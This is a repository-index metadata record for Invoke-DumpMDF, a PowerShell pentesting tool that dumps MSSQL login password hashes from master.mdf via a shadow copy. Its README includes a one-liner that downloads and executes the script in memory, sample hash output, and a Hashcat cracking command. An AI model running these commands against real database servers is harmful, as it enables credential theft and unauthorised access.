{"id":24206135,"url":"https://github.com/the-viper-one/invoke-dumpmdf","last_synced_at":"2026-02-28T05:37:04.925Z","repository":{"id":267849529,"uuid":"902545091","full_name":"The-Viper-One/Invoke-DumpMDF","owner":"The-Viper-One","description":"PowerShell script that extracts MSSQL logon hashes from master.mdf","archived":false,"fork":false,"pushed_at":"2025-01-13T16:29:12.000Z","size":115,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-13T16:48:22.162Z","etag":null,"topics":["mssql","pentesting","powershell"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/The-Viper-One.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-12-12T19:23:04.000Z","updated_at":"2025-01-13T16:29:15.000Z","dependencies_parsed_at":"2024-12-12T20:37:49.210Z","dependency_job_id":"87f4bed0-ca81-491f-b41f-36eb4fe4fad3","html_url":"https://github.com/The-Viper-One/Invoke-DumpMDF","commit_stats":null,"previous_names":["the-viper-one/invoke-dumpmdf"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/The-Viper-One%2FInvoke-DumpMDF","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/The-Viper-One%2FInvoke-DumpMDF/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/The-Viper-One%2FInvoke-DumpMDF/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/The-Viper-One%2FInvoke-DumpMDF/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/The-Viper-One","download_url":"https://codeload.github.com/The-Viper-One/Invoke-DumpMDF/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":233824781,"owners_count":18736054,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["mssql","pentesting","powershell"],"created_at":"2025-01-14T00:19:09.042Z","updated_at":"2025-09-22T04:33:16.378Z","avatar_url":"https://github.com/The-Viper-One.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Invoke-DumpMDF\n\nInvoke-DumpMDF is a PowerShell script based on the original code by XPN (xpn.github.io). Invoke-DumpMDF creates a Volume Shadow Copy of the running MSSQL database, allowing the master.mdf file to be safely copied even while in use. It then extracts the login password hashes found within the master database.\n\nThe resulting hashes can be cracked with Hashcat.\n\n## Requirements\n- Administrative or SYSTEM level privileges are required.\n- Execution on MSSQL Servers\n\n## Usage\n```powershell\n# Load into memory\nIEX(New-Object System.Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/The-Viper-One/Invoke-DumpMDF/refs/heads/main/Invoke-DumpMDF.ps1\")\n\n# Execute\nInvoke-DumpMDF\n```\n  \n## Example Output\n```powershell\nPS\u003e Invoke-DumpMDF\n\nName  : sa\nValue : 0x020050B40C7843AC5C196F9375549D3...\n\nName  : MS_PolicyEventProcessingLogin\nValue : 0x0200F54F742AB9F142716E96CB13317...\n\nName  : MS_PolicyTsqlExecutionLogin\nValue : 0x020043538738C5813669062A64AS0CC...\n```\n## Crack with Hashcat\n```\nhashcat.exe -m 1731 -a 0 -O 0x020050B40C7843AC5C196F9375549D3... Wordlists\\rockyou.txt -r rules\\best64.rule\n```\n## Further Reading \n- https://blog.xpnsec.com/extracting-master-mdf-hashes/\n- https://medium.com/@jacobdiamond/extracting-sql-user-hashes-leveraging-bak-files-for-mssql-server-access-in-ad-pentest-b42e7bbcc88c\n- https://github.com/xpn/Powershell-PostExploitation/blob/master/Invoke-MDFHashes/Get-MDFHashes.ps1\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthe-viper-one%2Finvoke-dumpmdf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthe-viper-one%2Finvoke-dumpmdf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthe-viper-one%2Finvoke-dumpmdf/lists"}